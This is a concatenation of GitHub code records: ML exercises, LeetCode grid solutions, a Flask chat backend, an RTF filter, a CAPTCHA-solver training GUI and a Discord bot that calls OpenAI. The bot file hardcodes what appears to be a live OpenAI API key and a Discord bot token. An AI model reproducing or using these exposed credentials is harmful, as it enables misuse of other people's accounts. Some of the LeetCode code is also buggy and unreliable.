plt.ylabel(\"girl height\")\n plt.scatter(X[:, 1], y, marker=\".\", c=\"None\", edgecolors=\"black\")\n\n Xe = extend_matrix(X)\n beta = normal_eq(Xe, y)\n\n print(beta)\n print(cost(Xe, y, beta))\n ug1 = [1, 65, 70]\n\n print(np.dot(ug1, beta))\n\n Xn = normalize(X, X)\n plt.figure(\"Girl, mom, Feature normalization\")\n plt.scatter(Xn[:, 0], y, marker=\".\", c=[[0,0,0,0]], edgecolors=\"black\")\n\n plt.figure(\"Girl, dad, Feature normalization\")\n plt.scatter(Xn[:, 1], y, marker=\".\", c=[[0,0,0,0]], edgecolors=\"black\")\n\n Xne = extend_matrix(Xn)\n beta_n = normal_eq(Xne, y)\n print(beta_n)\n print(cost(Xne, y, beta_n))\n ug1_n = normalize(np.array([65, 70]), X)\n print(np.dot(np.append([1], ug1_n), beta_n))\n # exit()\n print()\n print()\n print()\n\n # Gradient descent on non-normalized X\n # res = gradient_descent(Xe, y, a = 0.0002, n = 20000000)\n \n # Gradient descent on normalized X\n beta_gradient = gradient_descent(Xne, y, a = 0.05, n = 200, plot = True)\n print(\"Normalization, gradient descent:\")\n print(\" Height:\", np.dot(np.append([1], ug1_n), beta_gradient))\n print(\" Cost: \", cost(Xne, y, beta_gradient))\n\n\n\n\n plt.show()\n # print(cost(Xe, y, beta))\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"oenstrom/2DV516_A2","sub_path":"exerciseA.py","file_name":"exerciseA.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"31065001016","text":"import collections\nfrom typing import List\n\n\ndef longest1():\n def longestLine(M: List[List[int]]) -> int:\n row = collections.defaultdict(int)\n col = collections.defaultdict(int)\n ad = collections.defaultdict(int) # Ascending diagonal\n dd = collections.defaultdict(int) # Descending diagonal\n mx = 0\n for i in range(len(M)):\n for j in range(len(M[0])):\n if not M[i][j]:\n row[i] = col[j] = ad[j + i] = dd[j - i] = 0\n else:\n row[i] += 1\n col[j] += 1\n ad[j + i] += 1\n dd[j - i] += 1\n mx = max(mx, row[i], col[j], ad[j + i], dd[j - i])\n return mx\n\n mat = [[0, 1, 1, 0], [0, 1, 1, 0], [0, 0, 0, 1]]\n longestLine(mat)\n\n\ndef max_connected_island():\n def maxAreaOfIsland(grid: List[List[int]]) -> int:\n\n def explore(grid, r, c) -> int:\n if r >= len(grid) or r < 0 or c >= len(grid[0]) or col < 0:\n return 0\n if grid[r][c] == 0:\n return 0\n grid[r][c] = 0\n return 1 + explore(grid, r - 1, c) + explore(grid, r, c - 1) + explore(grid, r + 1, c) + explore(grid, r, c + 1)\n\n row = len(grid)\n col = len(grid[0])\n max_area = 0\n for i in range(row):\n for j in range(col):\n if grid[i][j] == 1:\n max_area = max(max_area, explore(grid, i, j))\n return max_area\n\n print(maxAreaOfIsland(grid = [[0,0,1,0,0,0,0,1,0,0,0,0,0],[0,0,0,0,0,0,0,1,1,1,0,0,0],[0,1,1,0,1,0,0,0,0,0,0,0,0],[0,1,0,0,1,1,0,0,1,0,1,0,0],[0,1,0,0,1,1,0,0,1,1,1,0,0],[0,0,0,0,0,0,0,0,0,0,1,0,0],[0,0,0,0,0,0,0,1,1,1,0,0,0],[0,0,0,0,0,0,0,1,1,0,0,0,0]]))\n\ndef robot_clean():\n def cleanRoom(robot):\n \"\"\"\n :type robot: Robot\n :rtype: None\n \"\"\"\n dfs(robot, 0, 0, 0, 1, set())\n\n def dfs(robot, x, y, direction_x, direction_y, visited):\n robot.clean()\n visited.add((x, y))\n\n for k in range(4):\n neighbor_x = x + direction_x\n neighbor_y = y + direction_y\n if (neighbor_x, neighbor_y) not in visited and robot.move():\n dfs(robot, neighbor_x, neighbor_y, direction_x, direction_y, visited)\n robot.turnLeft()\n robot.turnLeft()\n robot.move()\n robot.turnLeft()\n robot.turnLeft()\n robot.turnLeft()\n direction_x, direction_y = -direction_y, direction_x\n\n room = [[1, 1, 1, 1, 1, 0, 1, 1], [1, 1, 1, 1, 1, 0, 1, 1], [1, 0, 1, 1, 1, 1, 1, 1], [0, 0, 0, 1, 0, 0, 0, 0],\n [1, 1, 1, 1, 1, 1, 1, 1]]\n cleanRoom(room)\n\n\nclass Solution:\n def cleanRoom(self, robot):\n def dfs( robot, x, y, direction_x, direction_y, visited):\n robot.clean()\n visited.add((x, y))\n\n for k in range(4):\n neighbor_x = x + direction_x\n neighbor_y = y + direction_y\n if (neighbor_x, neighbor_y) not in visited and robot.move():\n dfs(robot, neighbor_x, neighbor_y, direction_x, direction_y, visited)\n robot.turnLeft()\n robot.turnLeft()\n robot.move()\n robot.turnLeft()\n robot.turnLeft()\n robot.turnLeft()\n direction_x, direction_y = -direction_y, direction_x\n dfs(robot, 0, 0, 0, 1, set())\n\n\ndef max_min_mat():\n seen = set()\n res=[]\n\n def maximumMinimumPath(grid: List[List[int]]) -> int:\n\n def dfs(grid, i, j):\n queue = collections.deque([(i,j),])\n temp=[]\n\n while queue:\n m,n = queue.popleft()\n temp.append(grid[m][n])\n seen.add((m, n))\n for r, c in (m + 1, n), (m - 1, n), (m, n + 1), (m, n - 1):\n if r>=len(grid[0]) or r<0 or c>=len(grid[0]) or c<0:\n continue\n elif r == len(grid)-1 and c==len(grid[0])-1:\n if res and sum(temp) > sum(res[-1]):\n res.append(temp)\n elif not res:\n res.append(temp)\n elif (r,c) not in seen:\n seen.add((r,c))\n queue.append((r,c))\n\n\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if (i,j) not in seen:\n dfs(grid, i, j)\n max_sum=0\n idx = 0\n 
for j, i in enumerate(res):\n if sum(i)>max_sum:\n idx = j\n max_sum = sum(i)\n print(\"Res \", res)\n return min(res[idx])\n\n grid = [[5, 4, 5], [1, 2, 6], [7, 4, 6]]\n print(maximumMinimumPath(grid))\n\ndef shortest_path():\n def shortestPathBinaryMatrix( grid: List[List[int]]) -> int:\n max_row = len(grid) - 1\n max_col = len(grid[0]) - 1\n directions = [(-1, 0), (0, -1), (0, 1), (1, 0)]\n\n # Helper function to find the neighbors of a given cell.\n def get_neighbours(row, col):\n for row_difference, col_difference in directions:\n new_row = row + row_difference\n new_col = col + col_difference\n if not (0 <= new_row <= max_row and 0 <= new_col <= max_col):\n continue\n if grid[new_row][new_col] != 0:\n continue\n yield (new_row, new_col)\n\n # Check that the first and last cells are open.\n if grid[0][0] != 0 or grid[max_row][max_col] != 0:\n return -1\n\n # Set up the BFS.\n queue = collections.deque()\n queue.append((0, 0))\n grid[0][0] = 1\n\n # Carry out the BFS.\n while queue:\n row, col = queue.popleft()\n distance = grid[row][col]\n if (row, col) == (max_row, max_col):\n return distance\n for neighbour_row, neighbour_col in get_neighbours(row, col):\n grid[neighbour_row][neighbour_col] = distance + 1\n queue.append((neighbour_row, neighbour_col))\n\n # There was no path.\n return -1\n\n grid = [[0, 0, 0], [1, 1, 0], [1, 1, 0]]\n print(shortestPathBinaryMatrix(grid))\n\nshortest_path()\n","repo_name":"arpith-kp/interviewrelated","sub_path":"leetcode_matrix.py","file_name":"leetcode_matrix.py","file_ext":"py","file_size_in_byte":6398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"31314275247","text":"import sys\nsys.path.append(\"/home/ubuntu/workspace/ml_dev_work\")\nimport pdb\nimport matplotlib as mpl\nmpl.use('Agg')\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom numpy.random import seed\nfrom utils.ml_utils import update_check\n\nIMG_PATH = '/home/ubuntu/workspace/finance/app/static/img/ml_imgs/'\n\nclass AdalineSGD(object):\n \"\"\"ADAptive LInear NEuron classifier.\n\n Parameters\n ------------\n eta : float\n Learning rate (between 0.0 and 1.0)\n n_iter : int\n Passes over the training dataset.\n\n Attributes\n -----------\n w_ : 1d-array\n Weights after fitting.\n errors_ : list\n Number of misclassifications in every epoch.\n shuffle : bool (default: True)\n Shuffles training data every epoch if True to prevent cycles.\n random_state : int (default: None)\n Set random state for shuffling and initializing the weights.\n \n \"\"\"\n def __init__(self, eta=0.01, n_iter=10, shuffle=True, random_state=None):\n self.eta = eta\n self.n_iter = n_iter\n self.w_initialized = False\n self.shuffle = shuffle\n if random_state:\n seed(random_state)\n \n def fit(self, X, y):\n \"\"\" Fit training data.\n\n Parameters\n ----------\n X : {array-like}, shape = [n_samples, n_features]\n Training vectors, where n_samples is the number of samples and\n n_features is the number of features.\n y : array-like, shape = [n_samples]\n Target values.\n\n Returns\n -------\n self : object\n\n \"\"\"\n self._initialize_weights(X.shape[1])\n self.cost_ = []\n for i in range(self.n_iter):\n # data needs to be presented in random order\n if self.shuffle:\n X, y = self._shuffle(X, y)\n cost = []\n for xi, target in zip(X, y):\n # update weights \"on-the-fly\" after each sample unlike regular adaline gradient descent\n # Other than that, very similar to adalineGD\n cost.append(self._update_weights(xi, target))\n avg_cost = sum(cost)/len(y)\n self.cost_.append(avg_cost)\n return self\n\n def partial_fit(self, X, y):\n \"\"\"Fit training data without reinitializing the weights\"\"\"\n # This can be used to continue learning on a model after weights have already been tuned to some extent\n if not self.w_initialized:\n self._initialize_weights(X.shape[1])\n if y.ravel().shape[0] > 1:\n for xi, target in zip(X, y):\n self._update_weights(xi, target)\n else:\n self._update_weights(X, y)\n return self\n\n def _shuffle(self, X, y):\n \"\"\"Shuffle training data\"\"\"\n r = np.random.permutation(len(y))\n return X[r], y[r]\n \n def _initialize_weights(self, m):\n \"\"\"Initialize weights to zeros\"\"\"\n self.w_ = np.zeros(1 + m)\n self.w_initialized = True\n \n def _update_weights(self, xi, target):\n \"\"\"Apply Adaline learning rule to update the weights\"\"\"\n output = self.net_input(xi)\n error = (target - output)\n # Same as adalineGD where the weights are updated even if prediction is right\n self.w_[1:] += self.eta * xi.dot(error)\n self.w_[0] += self.eta * error\n cost = 0.5 * error**2\n print(str(self.w_) + \"----\" + str(xi))\n return cost\n \n def net_input(self, X):\n \"\"\"Calculate net input\"\"\"\n return np.dot(X, self.w_[1:]) + self.w_[0]\n\n def activation(self, X):\n \"\"\"Compute linear activation\"\"\"\n return self.net_input(X)\n\n def predict(self, X):\n \"\"\"Return class label after unit step\"\"\"\n return np.where(self.activation(X) >= 0.0, 1, 
-1)","repo_name":"mccarvik/python_for_finance","sub_path":"research/ml_analysis/algorithms/adalinesgd.py","file_name":"adalinesgd.py","file_ext":"py","file_size_in_byte":3822,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"}
+{"seq_id":"39113736503","text":"import os\nimport discord\nfrom discord.ext import commands\n\n\nimport openai\nimport discord\nfrom discord.ext import commands\n\n# OpenAI API anahtarı ve Discord bot token'ı\nopenai.api_key = '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'\n\n# Discord bot token'ı\n# Discord Intents ayarı\nintents = discord.Intents.default()\nintents.messages = True\nintents.message_content = True\n\nbot = commands.Bot(command_prefix='kodland!', intents=intents)\n\n# Sohbet oturumu için bir dictionary yapısı.\nchat_sessions = {}\n\n@bot.event\nasync def on_ready():\n print(f'{bot.user.name} has connected to Discord!')\n\n@bot.command(name='chat')\nasync def chat(ctx, *, message):\n user_id = str(ctx.author.id)\n\n # Kullanıcının mevcut oturum ID'sini al.\n session_id = chat_sessions.get(user_id)\n\n # Kullanıcının mesajı ile bir mesaj listesi oluştur.\n messages = [\n {\"role\": \"system\", \"content\": \"senin adın Kodland Canlı Destek ve yardım sever bir asistansın, birisi sana adını sorduğunda adım Kodland Canlı Destek Demelisin\"},\n {\"role\": \"user\", \"content\": message}\n ]\n\n # ChatCompletion çağrısı yaparken session_id varsa ekleyin.\n chat_params = {\n \"model\": \"gpt-4\",\n \"messages\": messages\n }\n\n if session_id:\n chat_params[\"session_id\"] = session_id\n\n # ChatCompletion çağrısı.\n response = openai.ChatCompletion.create(**chat_params)\n\n # Cevabı ve yeni oturum ID'sini kaydet.\n # 'choices' içerisinden 'data' ve oradan da 'session_id' anahtarına ulaşılır.\n if 'data' in response['choices'][0]:\n chat_sessions[user_id] = response['choices'][0]['data']['session_id']\n else:\n # İlk yanıtta session_id yoksa, bu bir başlangıç yanıtıdır ve oturum ID'si henüz oluşturulmamış olabilir.\n # Bu durumda, bu kullanıcı için henüz bir session_id yok demektir.\n pass\n\n answer = response['choices'][0]['message']['content']\n\n # Gelen yanıtı Discord'da gönder.\n await ctx.send(answer)\n\n# Botu çalıştır.\nbot.run(\"MTE3MDcyMjQwOTI0Mjk1MTgxMg.GaSf0x.OcM33sEBXjC65xUPicRy48Z65EQBOsF88SADsA\")\n\n","repo_name":"toprakefeeker/Bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"14805981861","text":"from flask_restful import fields\r\nfrom models.Usuario import usuario_campos\r\n\r\ngrupo_campos = {\r\n 'criador_id': fields.Integer(attribute=\"criador.id\"),\r\n 'dataCriacao': fields.DateTime,\r\n 'descricao': fields.String,\r\n 'participantes': fields.List(fields.Nested(usuario_campos))\r\n}\r\n\r\n'''\r\n Classe Grupo.\r\n'''\r\nclass Grupo():\r\n def __init__(self, criador, nome, dataCriacao, descricao):\r\n self.criador = criador\r\n self.nome = nome\r\n self.dataCriacao = dataCriacao\r\n self.descricao = descricao","repo_name":"RRFreitas/GeekWay","sub_path":"geekway-api/models/Grupo.py","file_name":"Grupo.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"70235007528","text":"import encodings\n\nfrom django import template\nfrom django.template.defaultfilters import stringfilter\n\nregister = template.Library()\n\n\n@stringfilter\ndef rtflinebreaks(value):\n \"Converts newlines into RTF \\\\lines\"\n return value.replace(\"\\n\", \"{\\\\line}\")\n\n\nregister.filter(rtflinebreaks)\n\nencoder = encodings.codecs.getencoder(\"1252\")\n\n\ndef unicode_to_rtf(u):\n \"\"\"Replaces all high characters with \\\\u escape sequences,\n assuming a Windows 1252 code page\"\"\"\n # We will assume Windows code page for now (for maxiumum\n # likelihood of compatibility -- RTF only seems to support\n # the first 65535 chars of unicode anyway).\n # The document should have these codes\n # \\ansi\\ansicpg1252\\uc1\n output = []\n for char in u:\n if ord(char) > 127:\n try:\n encoded = encoder(char)\n except UnicodeEncodeError:\n encoded = encoder(\"?\")\n val = ord(encoded[0])\n if val < 256:\n # use \\' method:\n converted = \"\\\\'\" + hex(val)[2:]\n else:\n # Don't even know if this works. The\n # '?' is the alternate rendering, one byte long,\n # to match the '\\uc1' directive\n converted = \"\\\\u%d ?\" % val\n else:\n converted = str(char)\n output.append(converted)\n return \"\".join(output)\n\n\n@stringfilter\ndef rtfescape(value):\n \"Escapes RTF control characters\"\n\n return unicode_to_rtf(value.replace(\"\\\\\", \"\\\\\\\\\").replace(\"{\", \"\\\\{\").replace(\"}\", \"\\\\}\"))\n\n\nregister.filter(rtfescape)\n","repo_name":"cciw-uk/cciw.co.uk","sub_path":"cciw/officers/templatetags/rtf.py","file_name":"rtf.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"}
+{"seq_id":"22112460333","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nfrom trainer_gui import Ui_MainWindow\nfrom jcaptcha_image import JCaptchaImage, JCaptchaCharacterImage\nimport os, sys\n\n\nclass MessageBox:\n\tdef showMessage_trainingComplete(form):\n\t\tmsg = QtWidgets.QMessageBox(form)\n\t\tmsg.setText('All training data collected and Model trained successfully!')\n\t\tmsg.setWindowTitle('Training complete!')\n\t\tmsg.setWindowIcon(QtGui.QIcon('icon/robot.ico'))\n\t\tmsg.exec_()\n\n\tdef showMessage_emptyTextBox(form):\n\t\tmsg = QtWidgets.QMessageBox(form)\n\t\tmsg.setText('Invalid input data!')\n\t\tmsg.setWindowTitle('Try again!')\n\t\tmsg.setWindowIcon(QtGui.QIcon('icon/robot.ico'))\n\t\tmsg.exec_()\n\n#-------------------------\n\n\nclass TrainerApp:\n\tdef __init__(self):\n\t\tself.images_filenames = os.listdir('Training Images')\n\t\tself.imageName_index = 0\n\t\tself.training_X_outputFile = open('Collected Training Data/training_X.csv', 'w')\n\t\tself.training_Y_outputFile = open('Collected Training Data/training_Y.csv', 'w')\n\t\t#------------------------------\n\t\tapp = QtWidgets.QApplication(sys.argv)\n\t\tself.MainWindow = QtWidgets.QMainWindow()\n\t\tself.UI = Ui_MainWindow()\n\t\tself.UI.setupUi(self.MainWindow, self)\n\t\t#\n\t\tself.__remainingCount = len(self.images_filenames)\n\t\tself.__failedCount = 0\n\t\tself.UI.remaining_label.setText('Remaining: ' + str(self.__remainingCount))\n\t\tself.UI.failed_label.setText('Failed: 0')\n\t\t#\n\t\tself.MainWindow.show()\n\t\tsys.exit(app.exec_())\n\n\tdef storeTrainingData(self):\n\t\tif self.UI.answer_lineEdit.text() == '':\n\t\t\tMessageBox.showMessage_emptyTextBox(self.MainWindow)\n\t\t\treturn\n\t\tif self.imageName_index + 1 >= len(self.images_filenames):\n\t\t\tMessageBox.showMessage_trainingComplete(self.MainWindow)\n\t\t\tself.training_X_outputFile.close()\n\t\t\tself.training_Y_outputFile.close()\n\t\t\treturn\n\t\t#------------------------------\n\t\timg = JCaptchaImage('Training Images/' + self.images_filenames[self.imageName_index])\n\t\timg.treat()\n\t\timg.collect_character_imageList()\n\t\tjcaptcha_char_images = img.get_JCaptchaCharacterImage_List()\n\t\tanswer_text = self.UI.answer_lineEdit.text()\n\t\t#------------------------------\n\t\ttraining_X = ''\n\t\ttraining_Y = ''\n\t\t#---\n\t\tif len(jcaptcha_char_images) != len(answer_text):\n\t\t\topen('log.txt', 'a').write('Issue with ' + self.images_filenames[self.imageName_index] + '\\n')\n\t\t\tself.__failedCount += 1\n\t\t\tself.__remainingCount -= 1\n\t\t\tself.UI.failed_label.setText('Failed: ' + str(self.__failedCount))\n\t\t\tself.UI.remaining_label.setText('Remaining: ' + str(self.__remainingCount))\n\t\telse:\n\t\t\tfor i in range(len(jcaptcha_char_images)):\n\t\t\t\ttraining_X += jcaptcha_char_images[i].get_CSV() + '\\n'\n\t\t\t\ttraining_Y += answer_text[i] + '\\n'\n\t\t\tself.training_X_outputFile.write(training_X)\n\t\t\tself.training_Y_outputFile.write(training_Y)\n\t\t#------------------------------\n\t\tself.imageName_index += 1\n\t\tself.UI.captchaBox.setPixmap(QtGui.QPixmap(\"Training Images/\" + self.images_filenames[self.imageName_index]))\n\t\tself.UI.answer_lineEdit.setText('')\n\t\t#\n\t\tself.__remainingCount -= 1\n\t\tself.UI.remaining_label.setText('Remaining: ' + str(self.__remainingCount))\n\n\n#####\n#####\n#####\n\ndef main():\n\tif os.path.isfile('log.txt'):\n\t\tos.remove('log.txt')\n\ttrainer = TrainerApp()\n\nif __name__ == 
'__main__':\n\tmain()","repo_name":"ali-sajjad-rizavi/JCaptcha-Solver","sub_path":"Training/trainer.pyw","file_name":"trainer.pyw","file_ext":"pyw","file_size_in_byte":3197,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"}
+{"seq_id":"39795595010","text":"import ctypes\nfrom .wtypes import (\n BOOL,\n DWORD,\n GUID,\n LONG,\n POINTER,\n PVOID,\n PWSTR,\n ULARGE_INTEGER,\n ULONG,\n )\nfrom . import ref, fun_fact, raise_on_err\n\nfrom .kernel import KHANDLE, PKHANDLE\n\n_vdisk = ctypes.WinDLL(\"virtdisk.dll\")\n\n################################################################################\n\nATTACH_VIRTUAL_DISK_FLAG_NONE = 0\nATTACH_VIRTUAL_DISK_FLAG_READ_ONLY = 0x1\nATTACH_VIRTUAL_DISK_FLAG_NO_DRIVE_LETTER = 0x2\nATTACH_VIRTUAL_DISK_FLAG_PERMANENT_LIFETIME = 0x4\nATTACH_VIRTUAL_DISK_FLAG_NO_LOCAL_HOST = 0x8\nATTACH_VIRTUAL_DISK_FLAG_NO_SECURITY_DESCRIPTOR = 0x10\nATTACH_VIRTUAL_DISK_FLAG_BYPASS_DEFAULT_ENCRYPTION_POLICY = 0x20\nATTACH_VIRTUAL_DISK_FLAG_NON_PNP = 0x40\nATTACH_VIRTUAL_DISK_FLAG_RESTRICTED_RANGE = 0x80\nATTACH_VIRTUAL_DISK_FLAG_SINGLE_PARTITION = 0x100\nATTACH_VIRTUAL_DISK_FLAG_REGISTER_VOLUME = 0x200\n\nVIRTUAL_DISK_ACCESS_NONE = 0\nVIRTUAL_DISK_ACCESS_ATTACH_RO = 0x10000\nVIRTUAL_DISK_ACCESS_ATTACH_RW = 0x20000\nVIRTUAL_DISK_ACCESS_DETACH = 0x40000\nVIRTUAL_DISK_ACCESS_GET_INFO = 0x80000\nVIRTUAL_DISK_ACCESS_CREATE = 0x100000\nVIRTUAL_DISK_ACCESS_METAOPS = 0x200000\nVIRTUAL_DISK_ACCESS_READ = 0xd0000\nVIRTUAL_DISK_ACCESS_ALL = 0x3f0000\nVIRTUAL_DISK_ACCESS_WRITABLE = 0x320000\n\nOPEN_VIRTUAL_DISK_FLAG_NONE = 0\nOPEN_VIRTUAL_DISK_FLAG_NO_PARENTS = 0x1\nOPEN_VIRTUAL_DISK_FLAG_BLANK_FILE = 0x2\nOPEN_VIRTUAL_DISK_FLAG_BOOT_DRIVE = 0x4\nOPEN_VIRTUAL_DISK_FLAG_CACHED_IO = 0x8\nOPEN_VIRTUAL_DISK_FLAG_CUSTOM_DIFF_CHAIN = 0x10\nOPEN_VIRTUAL_DISK_FLAG_PARENT_CACHED_IO = 0x20\nOPEN_VIRTUAL_DISK_FLAG_VHDSET_FILE_ONLY = 0x40\nOPEN_VIRTUAL_DISK_FLAG_IGNORE_RELATIVE_PARENT_LOCATOR = 0x80\nOPEN_VIRTUAL_DISK_FLAG_NO_WRITE_HARDENING = 0x100\nOPEN_VIRTUAL_DISK_FLAG_SUPPORT_COMPRESSED_VOLUMES = 0x200\n\nOPEN_VIRTUAL_DISK_VERSION_UNSPECIFIED = 0\nOPEN_VIRTUAL_DISK_VERSION_1 = 1\nOPEN_VIRTUAL_DISK_VERSION_2 = 2\nOPEN_VIRTUAL_DISK_VERSION_3 = 3\n\nDETACH_VIRTUAL_DISK_FLAG_NONE = 0\n\nATTACH_VIRTUAL_DISK_VERSION_1 = 1\nATTACH_VIRTUAL_DISK_VERSION_2 = 2\n\n################################################################################\n\nclass VIRTUAL_STORAGE_TYPE(ctypes.Structure):\n _fields_ = (\n (\"DeviceId\", ULONG),\n (\"VendorId\", GUID),\n )\nPVIRTUAL_STORAGE_TYPE = POINTER(VIRTUAL_STORAGE_TYPE)\n\n################################################################################\n\nclass _OVDP_VERSION1(ctypes.Structure):\n _fields_ = (\n (\"RWDepth\", ULONG),\n )\n\nclass _OVDP_VERSION2(ctypes.Structure):\n _fields_ = (\n (\"GetInfoOnly\", BOOL),\n (\"ReadOnly\", BOOL),\n (\"ResiliencyGuid\", GUID),\n )\n\nclass _OVDP_VERSION3(ctypes.Structure):\n _fields_ = (\n (\"GetInfoOnly\", BOOL),\n (\"ReadOnly\", BOOL),\n (\"ResiliencyGuid\", GUID),\n (\"SnapshotId\", GUID),\n )\n\nclass _OVDP_UNION(ctypes.Union):\n _fields_ = (\n (\"Version1\", _OVDP_VERSION1),\n (\"Version2\", _OVDP_VERSION2),\n (\"Version3\", _OVDP_VERSION3),\n )\n\nclass OPEN_VIRTUAL_DISK_PARAMETERS(ctypes.Structure):\n _fields_ = ((\"Version\", LONG), (\"u\", _OVDP_UNION))\n _anonymous_ = (\"u\",)\nPOPEN_VIRTUAL_DISK_PARAMETERS = POINTER(OPEN_VIRTUAL_DISK_PARAMETERS)\n\n################################################################################\n\nclass _AVDP_VERSION1(ctypes.Structure):\n _fields_ = (\n (\"Reserved\", ULONG),\n )\n\nclass _AVDP_VERSION2(ctypes.Structure):\n _fields_ = (\n (\"RestrictedOffset\", ULARGE_INTEGER),\n (\"RestrictedLength\", ULARGE_INTEGER),\n )\n\nclass _AVDP_UNION(ctypes.Union):\n _fields_ = (\n (\"Version1\", 
_OVDP_VERSION1),\n (\"Version2\", _OVDP_VERSION2),\n )\n\nclass ATTACH_VIRTUAL_DISK_PARAMETERS(ctypes.Structure):\n _fields_ = ((\"Version\", LONG), (\"u\", _AVDP_UNION))\n _anonymous_ = (\"u\",)\nPATTACH_VIRTUAL_DISK_PARAMETERS = POINTER(ATTACH_VIRTUAL_DISK_PARAMETERS)\n\n################################################################################\n\n_OpenVirtualDisk = fun_fact(\n _vdisk.OpenVirtualDisk, (\n DWORD,\n PVIRTUAL_STORAGE_TYPE,\n PWSTR,\n LONG,\n LONG,\n POPEN_VIRTUAL_DISK_PARAMETERS,\n PKHANDLE\n )\n )\n\ndef OpenVirtualDisk(storage_type, path, access_mask, flags, parameters=None):\n hdl = KHANDLE()\n raise_on_err(\n _OpenVirtualDisk(\n ref(storage_type),\n path,\n access_mask,\n flags,\n None if parameters is None else ref(parameters),\n ref(hdl)\n )\n )\n return hdl\n\n################################################################################\n\n_AttachVirtualDisk = fun_fact(\n _vdisk.AttachVirtualDisk, (\n DWORD,\n KHANDLE,\n PVOID, # no interest in supplying a security descriptor\n LONG,\n ULONG,\n PATTACH_VIRTUAL_DISK_PARAMETERS,\n PVOID, # no interest in supplying an overlapped\n )\n )\n\ndef AttachVirtualDisk(hdl, flags, prov_flags=0, parameters=None):\n raise_on_err(\n _AttachVirtualDisk(\n hdl,\n None,\n flags,\n prov_flags,\n None if parameters is None else ref(parameters),\n None\n )\n )\n\n################################################################################\n\n_DetachVirtualDisk = fun_fact(\n _vdisk.DetachVirtualDisk, (\n DWORD,\n KHANDLE,\n LONG,\n ULONG,\n )\n )\n\ndef DetachVirtualDisk(hdl, flags=0, prov_flags=0):\n raise_on_err(_DetachVirtualDisk(hdl, flags, prov_flags))\n\n################################################################################\n","repo_name":"RoccoMatano/ctwin32","sub_path":"ctwin32/virtdisk.py","file_name":"virtdisk.py","file_ext":"py","file_size_in_byte":5618,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"}
+{"seq_id":"40432995887","text":"from flask_socketio import SocketIO, emit, join_room, leave_room\nfrom flask_login import current_user\nfrom app.models import db, Chat\nimport os\n\nif os.environ.get(\"FLASK_ENV\") == \"production\":\n origins = [\"http://yillow-app.herokuapp.com\", \"https://yillow-app.herokuapp.com\"]\nelse:\n origins = \"*\"\n\nsocketio = SocketIO(cors_allowed_origins=origins)\n\n@socketio.on(\"join\")\ndef on_join(channel_id):\n join_room(channel_id)\n\n@socketio.on(\"leave\")\ndef on_leave(channel_id):\n leave_room(channel_id)\n\n@socketio.on(\"chat\")\ndef handle_chat(data):\n channel_id = data['channel_id']\n user_id = data['user_id']\n message = data[\"message\"]\n created_at = data[\"created_at\"]\n\n new_chat = Chat(channel_id=channel_id, user_id=user_id, message=message, created_at=created_at)\n db.session.add(new_chat)\n db.session.commit()\n\n\n emit(\"chat\", new_chat.to_dict(),\\\n to=str(channel_id),\n broadcast=True)\n\n@socketio.on(\"edit\")\ndef handle_edit(data):\n chat_id = data[\"id\"]\n message = data[\"message\"]\n\n chat = Chat.query.get(chat_id)\n chat.message = message\n\n db.session.commit()\n\n emit(\"edit\", chat.to_dict(), to=str(chat.channel_id), broadcast=True)\n\n@socketio.on(\"delete\")\ndef handle_delete(chat_id):\n chat = Chat.query.get(chat_id)\n channel_id = str(chat.channel_id)\n\n db.session.delete(chat)\n db.session.commit()\n\n data = {\"chat_id\": chat_id, \"channel_id\": int(channel_id)}\n\n emit(\"delete\", data, to=channel_id, broadcast=True)\n","repo_name":"frances-y-h/yillow","sub_path":"app/socket.py","file_name":"socket.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"}
+{"seq_id":"4662021490","text":"import csv\nimport json\nfrom shutil import rmtree\nfrom os import mkdir, path\n\n\ndef create_dir():\n mkdir('temp')\n\n\ndef remove_dir():\n rmtree('temp')\n\n\ndef csv_to_json(csv_file, json_file):\n arr = list()\n\n if path.exists(csv_file):\n with open(csv_file, encoding=\"utf8\") as f:\n reader = csv.DictReader(f)\n\n for line in reader:\n arr.append(line)\n\n with open(json_file, 'w', encoding=\"utf8\") as f:\n indent = len(arr[0])\n conv = json.dumps(arr, indent=indent, ensure_ascii=False)\n f.write(conv)\n else:\n return \"CSV file doesn't exist!\"\n\n\n# def json_to_csv(csv_file, json_file):\n#\n return\n","repo_name":"kreker783/CSV-JSON-Converter","sub_path":"code/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"2135336772","text":"N = int(input())\npeople = []\nfor _ in range(N):\n people.append(list(map(int, input().split())))\nfor i in people:\n rank = 1\n for j in people:\n if j[0] > i[0] and j[1] > i[1]:\n rank += 1\n print(rank, end=' ')\n","repo_name":"WoosubLeee/algorithm-study","sub_path":"백준/Silver/7568/7568_덩치.py","file_name":"7568_덩치.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
